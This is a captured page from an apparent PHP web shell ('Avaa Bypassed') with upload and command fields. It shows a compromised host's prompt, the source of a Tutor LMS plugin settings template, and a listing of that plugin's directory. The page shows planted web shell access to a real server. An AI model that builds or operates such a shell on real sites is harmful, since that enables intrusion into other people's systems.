[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.119.255.135: ~ $
<?php
/**
 * Notification settings
 *
 * @package Tutor\Views
 * @subpackage Tutor\Tools
 * @author Themeum <support@themeum.com>
 * @link https://themeum.com
 * @since 2.0.0
 */

//phpcs:ignore -- contain safe data 
echo $this->view_template( 'common/reset-button-template.php', $section ); ?>

<?php
foreach ( $section['blocks'] as $blocks ) :
	if ( empty( $blocks['label'] ) ) :
		?>
		<div class="tutor-option-single-item tutor-mb-32">
			<?php echo $this->blocks( $blocks ); //phpcs:ignore -- contain safe data ?>
		</div>
	<?php else : ?>
		<?php echo $this->blocks( $blocks ); //phpcs:ignore -- contain safe data ?>
	<?php endif; ?>
<?php endforeach; ?>

Filemanager

Name Type Size Permission Actions
common Folder 0755
basic.php File 918 B 0644
buddypress.php File 293 B 0644
color_picker.php File 4.48 KB 0644
design.php File 676 B 0644
google_classroom.php File 570 B 0644
gradebook.php File 936 B 0644
import_export.php File 7.47 KB 0644
notifications.php File 661 B 0644
status.php File 666 B 0644
tab.php File 1.85 KB 0644
tutor_pages.php File 2.87 KB 0644
zoom.php File 71 B 0644